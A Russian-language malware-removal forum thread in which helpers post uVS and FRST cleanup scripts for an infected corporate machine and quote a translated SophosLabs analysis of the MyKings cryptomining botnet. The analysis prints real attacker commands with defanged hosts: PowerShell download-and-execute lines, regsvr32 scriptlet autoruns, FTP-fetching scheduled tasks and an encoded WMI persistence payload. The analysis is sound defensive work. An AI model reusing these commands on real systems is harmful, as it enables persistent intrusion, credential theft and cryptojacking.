выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
[code]

;uVS v4.11.8 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.3
v400c
OFFSGNSAVE
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_BROWSERS.CM1GY-YR.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_GLOBAL.ASAX.9ROHC7PQ.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\RPC\296C8D2F\5A4276D8\APP_GLOBAL.ASAX.B43PI4NY.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\AUTODISCOVER\1E0EBF5E\81BBFD0C\APP_GLOBAL.ASAX.CQHP4HAL.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\EWS\82CED47D\9F9837FE\APP_GLOBAL.ASAX.F82CQ-3M.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OWA_CALENDAR\50586ABB\43FE3563\APP_GLOBAL.ASAX.FJON4ZRX.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\MAPI\236CA80D\613D0742\APP_GLOBAL.ASAX.GFOSMOYG.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\AUTODISCOVER\B455E468\CBAAC37D\APP_GLOBAL.ASAX.LOVEIRWB.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OWA\8E05B027\E164D61B\APP_GLOBAL.ASAX.N3CT8VNU.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OWA\F1907565\9FA11D9F\APP_GLOBAL.ASAX.P7BTXYGD.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OAB\5A665F22\C3DD660B\APP_GLOBAL.ASAX.QXTXGCN5.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\EWS\9BF2358A\E86A63DA\APP_GLOBAL.ASAX.RGDBHA8I.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\MAPI_EMSMDB\FF130E68\58BD4667\APP_GLOBAL.ASAX.T_-RLTDU.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\POWERSHELL\788CBAD3\5ED4F687\APP_GLOBAL.ASAX.VOPJ5BFR.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\1CD810A3\710C31B6\APP_GLOBAL.ASAX.ZIGCDRV_.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_THEME_DEFAULT._PA_PVFA.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_0EXSSJHG.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_2X1TGTE0.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_2ZYUFYVK.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_BZJN21B2.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_DPLFNAEX.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_FHHKYG34.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_FRZ2LSJQ.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_HHL3EFGE.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_LUOS5NMH.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_MT1YTSHN.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OWA\8E05B027\E164D61B\APP_WEB_O5BJKYBG.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_OCV4TGXS.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_QDEJ0KXZ.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_WKYXHA1V.DLL
czoo
QUIT
[/code]
без перезагрузки
архив из каталога uVS (по формату: ZOO_гггг-мм-дд_чч-мм-сс.rar/7z)  отправить в [email protected]
------------

добавьте образ автозапуска системы

горячая тема, возможно Mykings рапространился в сети предприятия.
https://forum.kasperskyclub.ru/topic/84069-zarazhenie-korporativnoj-seti-zlovred-trojanmultigenautorunwmis-ili-a-on-zhe-heurtrojanmultigenautorunsvcksws-on-zhe-powershellmuldrop129powershelldownloader1452/

[B]SophosLab[/B] ранее опубликовал детальный отчет о работе ботнета Mykings, который возможно и стоит за многими атаками на системы с использованием EternalBlue NSA exploit, инструментария WMI для обновления и экплуатации систем с целью майнинга криптовалют, буткита для закрепления устойчивой работы бэкдора и майнеров и др.

[B]MyKings: медленный, но неустанный рост ботнета
[/B]
   Ботнет [B]MyKings[/B] имеет широкую ряд автоматизированных методов взлома серверы - все для установки майнера криптовалюты.

Вступление

Ботнет [B]MyKings / DarkCloud / Smominru[/B] (который мы будем называть MyKings) был активен в течение двух лет. Хотя отдельные модули были описаны в нескольких публикациях, в прошлом эта статья не фокусировалась на глубоком анализе отдельных используемых вредоносных компонентов. во время активности. Здесь мы смотрим на взаимодействие между различными элементами инструментов, используемыми злоумышленников MyKings и их роли в процессе заражения, чтобы получить полную картину работа ботнета. Ботнет обычно доставляет криптомайнеры и трояны удаленного доступа (RAT). Недавно злоумышленники, стоящие за MyKings, добавили функциональность буткита, чтобы избежать обнаружения и установить постоянство это трудно удалить или смягчить. Самая ранняя активность MyKings датируется 2016 годом, и с тех пор она активна, но мы обнаружили некоторые пересекаются в образцах и серверной инфраструктуре с более ранней кампанией.

Основные выводы этого исследования заключаются в следующем:

* Ботнет распространяется путем атаки на слабые комбинации имени пользователя и пароля в MySQL, MSSQL, telnet, ssh, IPC, WMI, RDP, а также дополнительно использует EternalBlue для бокового движения.

* Во время начальных процессов заражения ботнет защищает компьютер; удаляет процессы, файлы и настройки, принадлежащие семействам вредоносных программ, управляемые другими угрозами актеры; и закрывает коммуникационные порты, которые могут быть использованы для повторного заражения компьютера.

Злоумышленники, стоящие за этим ботнетом, предпочитают использовать открытый исходный код или другое доступное ПО и обладают достаточными навыками, чтобы вносить изменения и улучшения в исходный код.

Основными целями ботнета являются страны Азии, но мы можем найти инфекции повсюду.

В число наиболее инфицированных стран входили:

* Китай * Тайвань * Россия * Бразилия * США * Индия * Япония

Процесс заражения

Компоненты ботнета очень взаимосвязаны, и существует множество возможных путей или способв заражений.

ok.exe - установщик буткита Ботнет MyKings начал интенсивно использовать компоненты буткита в начале 2019 года. Однако первые версии установщика буткита датируются июнем 2018 г.

Наиболее распространенный вариант попадал в зараженные системы с именами файлов ok.exe или max.exe.

Установщики буткитов обычно защищены с помощью VMProtect, что делает более сложным точный анализ.

Это характерно для ботнета: есть несколько компонентов, каждый из которых они делают очень похожую процедуру самообновления. Таким образом, даже если большинство компонентов ботнет удаляется с компьютера, остальные имеют возможность восстановить его до полной силы.

Он выполняет поиск в списке запущенных процессов и завершает те, которые связаны с продуктами безопасности, используя жестко запрограммированный список имен.

c3.bat - это компонент, который завершает процесс заражения. Это относительно большой командный файл; В размер варьируется, но обычно он составляет от 3 000 до 20 000 байт. Он запускает несколько десятков процессов по мере выполнения своей задачи - загрузки обновлений, установки. компоненты, устанавливая стойкость и очищая все следы, которые были созданы во время начальный процесс заражения. Это наиболее часто используемый компонент кампаний, было несколько десятков его вариантов. обнаружено, что они отличались в незначительных деталях, таких как список уничтожения или имена учетных записей пользователей. Обычно он устанавливается из самораспаковывающихся архивов RAR, содержащих два файла, n.vbs и c3.bat.

Криптомайнинг - ресурсоемкий процесс, на компьютере есть место только для одного. MyKings пытается убедиться, что ему не нужно делить драгоценный процессор с другими майнерами - даже если они дружеские. Многие имена процессов используются более старыми версиями ботнета MyKings, поэтому этот механизм также может служить частью процесса обновления. Обратите внимание, что более старые версии майнеров, вероятно, использовали более старые (и уже заблокированы) идентификаторы кошельков, которые бесполезны. Список убитых процессов со временем менялся

Некоторые имена используются чаще, другие могут быть связаны с конкретными угрозами, например:

[QUOTE] doc001.exe (майнер XMRig)
   docv8.exe (майнер XMRig)
   wodCmdTerm.exe (майнер XMRig)
   NsCpuCNMiner64.exe (CNMiner)
   tlscntr.exe (майнер XMRig)
   ctfmonc.exe (майнер XMRig)
   wuauser.exe (майнер XMRig)
   mscsuscr.exe (майнер XMRig)
   Pviunc.exe (майнер XMRig)
   Bllianc.exe (майнер XMRig)
   dether.exe (майнер XMRig)
[/QUOTE]

Правила межсетевого экрана

Пакетный файл изменяет правила брандмауэра. Цель состоит в том, чтобы закрыть порты, которые использовались для первоначального инфекции или могут быть использованы для последующих инфекций. Таким образом ботнет защищает себя от враждебных захват, обезопасив зараженный компьютер. Он создает новые правила брандмауэра, которые блокируют доступ к зараженному компьютеру на портах 135, 137, 138, 139 и 445 (относится к таким службам, как RPC, NetBIOS и Active Directory). Это закрывает возможность повторное заражение с помощью эксплойта RDP или EternalBlue.

Обновление компонентов

Скрипт скачивает с сайтов обновлений ряд различных скриптов, например:

[QUOTE] powershell.exe IEX (New-Object
   system.Net.WebClient).DownloadString('hxxp://wmi.1217bye[.]host/S.ps1')&powershell.exe IEX
   (New-Object
   system.Net.WebClient).DownloadString('hxxp://173.208.139[.]170/s.txt')&powershell.exe IEX
   (New-Object system.Net.WebClient).DownloadString('hxxp://35.182.171[.]137/s.jpg')||regsvr32 /u
   /s /i:hxxp://wmi.1217bye[.]host/1.txt scrobj.dll®svr32 /u /s
   /i:hxxp://173.208.139[.]170/2.txt scrobj.dll®svr32 /u /s /i:hxxp://35.182.171[.]137/3.txt
   scrobj.dll"[/QUOTE]

Роль загружаемых файлов следующая:
• s.ps1: завершает все процессы svchost.exe и conhost.exe, которые не выполняются из системный каталог и выполняет c: \ windows \ temp \ conhost.exe
• s.txt: скрипт сбора информации
• s.jpg: убивает процессы, связанные с майнером, и определяет правила брандмауэра.
• 1.txt: загружает компоненты PE (обычно установщик буткита и дроппер c3.bat).
• 2.txt: список URL-адресов для компонентов.

Загружается несколько различных компонентов, и используются несколько методов сохранения, чтобы убедиться, что буткит переживает перезагрузку на компьютере

Устойчивость

Пакетный сценарий использует несколько различных методов для достижения устойчивости и выживаемости после загрузки системы

Буткит

Компонент буткита - это первый из методов сохранения. Поскольку в IPL перезаписывается вредоносный код, он будет выполняться при каждой перезагрузке, а также загружает и запускает компоненты ботнета.

Ключи автозапуска в реестре

В дополнение к этому пакетный файл создает ключ автозапуска реестра, который использует regsvr32.exe для извлечения и выполнения обновления, в данном случае v.sct, который представляет собой простой скриптлет, загружающий компоненты Win32.

 [QUOTE] reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "start" /d
   "regsvr32 /u /s /i:hxxp://js.1226bye[.]xyz:280/v.sct scrobj.dll" /f

   reg add "HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\­Run" /v
   "start" /d "regsvr32 /u /s /i:hxxp://js.1226bye[.]xyz:280/v.sct scrobj.dll" /f[/QUOTE]



Задачи по расписанию

Некоторые компоненты прописаны в отдельную задачу. Названия задач обычно:
ok, Mysa, Mysa1, Mysa2 и Mysa3.

Запланированные задачи выполняются при запуске системы с помощью командной строки, которая подключается к ftp-серверу. и скачивает обновление, в случае задачи Mysa исполняемый файл будет сохранен как a.exe

 [QUOTE] schtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.1226bye[.]xyz>s&echo
   test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo
   bye>>s&ftp -s:s&c:\windows\update.exe" /ru "system" /sc onstart /F

   schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.1226bye[.]xyz>p&echo
   test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp
   -s:p" /ru "system" /sc onstart /F

   schtasks /create /tn "Mysa3" /tr "cmd /c echo open ftp.1226bye[.]xyz>ps&echo
   test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo
   bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe" /ru "system" /sc onstart /F[/QUOTE]

Запланированные задачи обычно загружают дополнительные компоненты через ftp-соединение, в данном конкретном случае. бэкдор Forshare и майнер.

Затем другой набор задач запускает загруженный файл ok.dat, который является файлом DLL Windows, поэтому сценарий выполняет экспорт ServiceMain с параметром aaaa. Этот компонент является бэкдором PCShare.
[QUOTE]
   schtasks / create / tn "Mysa1" / tr "rundll32.exe c: \ windows \ debug \ item.dat, ServiceMain aaaa "/ ru" system "/ sc onstart / F schtasks / create / tn "ok" / tr "rundll32.exe c: \ windows \ debug \ ok.dat, ServiceMain aaaa "/ ru" система "/ sc onstart / F[/QUOTE]



сценарии WMI

Третий метод использует фильтры WMI для установления исполнения.

c3.bat сначала удаляет следующие сценарии событий WMI, созданные более ранней версией ботнета:

[QUOTE] • fuckyoumm2_filter
   • fuckyoumm2_consumer
   • fuckayoumm3
   • fuckayoumm4
   • Windows Events Consumer
   • Windows Events Consumer4
   • Windows Events Filter[/QUOTE]


Затем регистрирует новый фильтр с именем fuckyoumm4, который выполняется каждые 3 часа (10800 секунд).

  [QUOTE] wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3",
   EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM
   __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA
   'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\\root\subscription"
   PATH CommandLineEventConsumer CREATE Name="fuckyoumm4",
   CommandLineTemplate="cmd /c powershell.exe -nop -enc
   \"JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALg­BOAGUAdAAuAFcAZQBiA
   EMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAa­QBuAGcAKAAnAGgAdAB0
   AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIA­LgB0AHgAdAAnACkALgB
   0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACc­AfAAlAHsAJABuAD0AJA
   BfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG­8AdwBuAGwAbwBhAGQAR
   gBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9A­A==\"&powershell.ex
   e IEX (New-Object
   system.Net.WebClient).DownloadString('hxxp://wmi.1217bye[.]host/S.ps1')&powersh
   ell.exe IEX (New-Object
   system.Net.WebClient).DownloadString('hxxp://173.208.139[.]170/s.txt')&powershe
   ll.exe IEX (New-Object
   system.Net.WebClient).DownloadString('hxxp://35.182.171[.]137/s.jpg')||regsvr32
   /u /s /i:hxxp://wmi.1217bye[.]host/1.txt scrobj.dll®svr32 /u /s
   /i:hxxp://173.208.139[.]170/2.txt scrobj.dll®svr32 /u /s
   /i:hxxp://35.182.171[.]137/3.txt scrobj.dll"&wmic
   /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE
   Filter="__EventFilter.Name=\"fuckyoumm3\"",
   Consumer="CommandLineEventConsumer.Name=\"fuckyoumm4\""
[/QUOTE]

Это код события - зашифрованная команда PowerShell, которая загружает текстовый файл с URL-адреса.

  [QUOTE] hxxp: //wmi.1217bye [.] host / 2.txt (URL-адрес может со временем измениться).

   $wc=New-Object
   System.Net.WebClient;$wc.DownloadString('hxxp://wmi.1217bye[.]host/2.txt').trim(
   ) -split '[\r\n]+'|%{$n=$_.split('/')[-1];$wc.DownloadFile($_, $n);start $n;}
[/QUOTE]
Содержимое этого файла должно содержать список URL-адресов следующего этапа, которые загружаются и выполнен. Пример содержимого файла 2.txt был следующим:

 [QUOTE] hxxp://173.247.239[.]186/ok.exe
   hxxp://173.247.239[.]186/upsupx.exe
   hxxp://173.247.239[.]186/u.exe[/QUOTE]

Дополнительные три команды в сценарии WMI загружают еще три компонента:

  [QUOTE] hxxp://173.208.139[.]170/s.txt
   hxxp://35.182.171[.]137/s.jpg
   hxxp://wmi.1217bye[.]host/S.ps1[/QUOTE]

Здесь s.txt - это сценарий PowerShell, который загружает файл списка уничтожения из hxxp: //139.5.177 [.] 19 / l.txt.

Этот файл содержит список имен процессов; сценарий останавливает каждый процесс в этом списке:

 [QUOTE] lsmose.exe,C:\Windows\debug\lsmose.exe,1
   lsmos.exe,C:\Windows\debug\lsmos.exe,1
   lsmo.exe,C:\Windows\debug\lsmo.exe,1
   csrw.exe,C:\Program Files (x86)\Common Files\csrw.exe,119
   csrw.exe,C:\Program Files\Common Files\csrw.exe,1
   lsmosee.exe,c:\windows\help\lsmosee.exe,1
   csrs.exe,c:\csrs.exe,1[/QUOTE]


В завершение c3.bat загружает и выполняет s.txt. Это извлекает список уничтожения и останавливает процессы указанный в нем, а также дополнительно загружает и выполняет сценарий с именем up.txt. Это сценарий сбора информации, который собирает системную информацию (включая пароли, использующие Powerkatz) и загружает его на ftp-сервер 192.187.111.66, который был активным сервером сбора. на момент написания этого документа.

[URL=https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophoslabs-uncut-mykings-report.pdf]полный отчет здесь[/URL]

[QUOTE]Владимир Шариков написал:
Спасибо. Сейчас буду проверять всё что ниписали. Но с того момента как заблокировал всю хетслерскую сеть, так уже вторую неделю не видим проблем. Но проверять нужно.[/QUOTE]
а по логам DNS можете проверить, были из внутренней сети попытки подключения на заблокированные адреса?

проверьте сейчас возможность установки

Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!

[CODE]HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
2021-08-11 22:17 - 2020-10-10 17:46 - 000000000 __SHD C:\AdwCleaner
2021-08-11 23:43 - 2021-03-09 22:20 - 000000000 __SHD C:\Program Files\RDP Wrapper
2021-08-12 22:32 - 2021-05-02 21:44 - 000000000 __SHD C:\ProgramData\Setup
2021-08-12 22:26 - 2020-10-10 17:46 - 000000000 __SHD C:\ProgramData\install
2021-08-13 23:38 - 2021-03-09 22:20 - 000000000 __SHD C:\rdp

2020-10-10 17:46 C:\KVRT_Data
2020-10-10 17:46 C:\Program Files\AVAST Software
2020-10-10 17:46 C:\Program Files\AVG
2020-10-10 17:46 C:\Program Files\Cezurity
2020-10-10 17:46 C:\Program Files\COMODO
2020-10-10 17:46 C:\Program Files\Enigma Software Group
2020-10-10 17:46 C:\Program Files\ESET
2020-10-10 17:46 C:\Program Files\Kaspersky Lab
2020-10-10 17:46 C:\Program Files\Malwarebytes
2020-10-10 17:46 C:\Program Files\SpyHunter
2020-10-10 17:46 C:\Program Files (x86)\360
2020-10-10 17:46 C:\Program Files (x86)\AVAST Software
2020-10-10 17:46 C:\Program Files (x86)\AVG
2020-10-10 17:46 C:\Program Files (x86)\Cezurity
2020-10-10 17:46 C:\Program Files (x86)\GRIZZLY Antivirus
2020-10-10 17:46 C:\Program Files (x86)\Kaspersky Lab
2020-10-10 17:46 C:\Program Files (x86)\Microsoft JDX
2020-10-10 17:46 C:\Program Files (x86)\Panda Security
2020-10-10 17:46 C:\Program Files (x86)\SpyHunter
2020-10-10 17:46 C:\Windows\speechstracing
2020-10-10 17:46 C:\Program Files\Common Files\McAfee
2020-10-10 17:46 C:\ProgramData\360safe
2020-10-10 17:46 C:\ProgramData\Avira
2020-10-10 17:46 C:\ProgramData\Doctor Web
2020-10-10 17:46 C:\ProgramData\ESET
2020-10-10 17:46 C:\ProgramData\grizzly
2020-10-10 17:46 C:\ProgramData\Indus
2020-10-10 17:46 C:\ProgramData\Kaspersky Lab
2020-10-10 17:46 C:\ProgramData\Kaspersky Lab Setup Files
2020-10-10 17:46 C:\ProgramData\Malwarebytes
2020-10-10 17:46 C:\ProgramData\MB3Install
2020-10-10 17:46 C:\ProgramData\McAfee
2020-10-10 17:46 C:\ProgramData\Norton

EmptyTemp:
Reboot:
[/CODE]

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
[code]

;uVS v4.11.8 [http://dsrt.dyndns.org:8888]
;Target OS: NTv10.0
v400c
OFFSGNSAVE
regt 18
;------------------------autoscript---------------------------

delall %SystemDrive%\PROGRAMDATA\REALTEKHD\TASKHOST.EXE
delall %SystemDrive%\PROGRAMDATA\REALTEKHD\TASKHOSTW.EXE
delall %SystemDrive%\PROGRAMDATA\WINDOWSTASK\WINLOGON.EXE
delall %SystemDrive%\USERS\ALEX\APPDATA\ROAMING\MICROSOFT\WINDOWS\H­ELPER.EXE
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DEFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ%26INSTALLSOURCE%3D­ONDEMAND%26UC
delref HTTP://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DLDGPJDIADOMHINPIMGCHMEEMBBGOJNJK%26INSTALLSOURCE%3D­ONDEMAND%26UC
apply

deltmp
delref %Sys32%\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_EDAB19158BDD0D0A\DISPLAY.NVCONTAINER\NVDISPLAY.CONTAINER.EXE -S NVDISPLAY.CONTAINERLOCALSYSTEM -F C:\PROGRAMDATA\NVIDIA\NVDISPLAY.CONTAINERLOCALSYSTEM.LOG -L 3 -D C:\WINDOWS\SYSTEM32\DRIVERSTORE\FILEREPOSITORY\NV_DISPI.INF_AMD64_EDAB19158BDD0D0A\DISPLAY.NVCONTAINER\PLUGINS\LOCALSYSTEM -R -P 30000 -CFG NVDISPLAY.CONTAINERLOCALSYSTEM\LOCALSYSTEM
delref %SystemDrive%\USERS\ALEX\APPDATA\LOCAL\TEMP\{D4FCC862-EDED-469A-8F56-FA818FD48E7D}-92.0.4515.131_CHROME_INSTALLER.EXE
delref {E984D939-0E00-4DD9-AC3A-7ACA04745521}\[CLSID]
delref %SystemRoot%\SYSWOW64\MAPSTOASTTASK.DLL
delref %SystemRoot%\SYSWOW64\MAPSUPDATETASK.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\IOBIT\IOBIT MALWARE FIGHTER\SUMP.EXE
delref %SystemRoot%\SYSWOW64\GPSVC.DLL
delref %SystemRoot%\SYSWOW64\VID.DLL
delref %SystemRoot%\SYSWOW64\WEVTSVC.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\TCPIP.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\MRXSMB.SYS
delref %SystemRoot%\SYSWOW64\W32TIME.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\NDIS.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\USBXHCI.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\SRV2.SYS
delref %SystemRoot%\SYSWOW64\RDPCORETS.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\DXGMMS2.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\HTTP.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\WINNAT.SYS
delref %SystemRoot%\SYSWOW64\UMPOEXT.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\VMBUSR.SYS
delref %SystemRoot%\SYSWOW64\BTHSERV.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\DMVSC.SYS
delref %SystemRoot%\SYSWOW64\IPHLPSVC.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\VMBKMCL.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\REFS.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\SPACEPORT.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\FVEVOL.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\AFD.SYS
delref %SystemRoot%\SYSWOW64\PNRPSVC.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\PACER.SYS
delref %SystemRoot%\SYSWOW64\HVHOSTSVC.DLL
delref %SystemRoot%\SYSWOW64\LSM.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\SYNTH3DVSC.SYS
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID]
delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID]
delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID]
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID]
delref {88D969C0-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C1-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C2-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C3-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C4-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C5-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID]
delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID]
delref %SystemRoot%\SYSWOW64\IE4USHOWIE.EXE
delref %SystemRoot%\SYSWOW64\IE4UINIT.EXE
delref {1FBA04EE-3024-11D2-8F1F-0000F87ABD16}\[CLSID]
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\88.0.4324.182\INSTALLER\CHRMSTP.EXE
delref %SystemRoot%\SYSWOW64\BLANK.HTM
delref {0F8604A5-4ECE-4DE1-BA7D-CF10F8AA4F48}\[CLSID]
delref {E6FB5E20-DE35-11CF-9C87-00AA005127ED}\[CLSID]
delref %Sys32%\DRIVERS\VMBUSR.SYS
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\90.0.818.66\MSEDGE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT OFFICE\ROOT\OFFICE16\WWLIB.DLL
delref %Sys32%\DRIVERS\UMDF\USBCCIDDRIVER.DLL
delref %Sys32%\BLANK.HTM
delref SLDWORKS SHELL EXTENSION\[CLSID]
delref %Sys32%\DRIVERS\53912204.SYS
delref %Sys32%\DRIVERS\59163187.SYS
delref %Sys32%\DRIVERS\HDAUDADDSERVICE.SYS
delref HELPSVC\[SERVICE]
delref SACSVR\[SERVICE]
delref SWPRV\[SERVICE]
delref TBS\[SERVICE]
delref VMMS\[SERVICE]
delref BROWSER\[SERVICE]
delref MESSENGER\[SERVICE]
delref RDSESSMGR\[SERVICE]
delref %SystemDrive%\PROGRAM FILES (X86)\FINALWIRE\AIDA64 EXTREME\KERNELD.X64
delref %SystemRoot%\TEMP\CPUZ149\CPUZ149_X64.SYS
delref %Sys32%\DRIVERS\EW_HWUSBDEV.SYS
delref %Sys32%\DRIVERS\EW_USBENUMFILTER.SYS
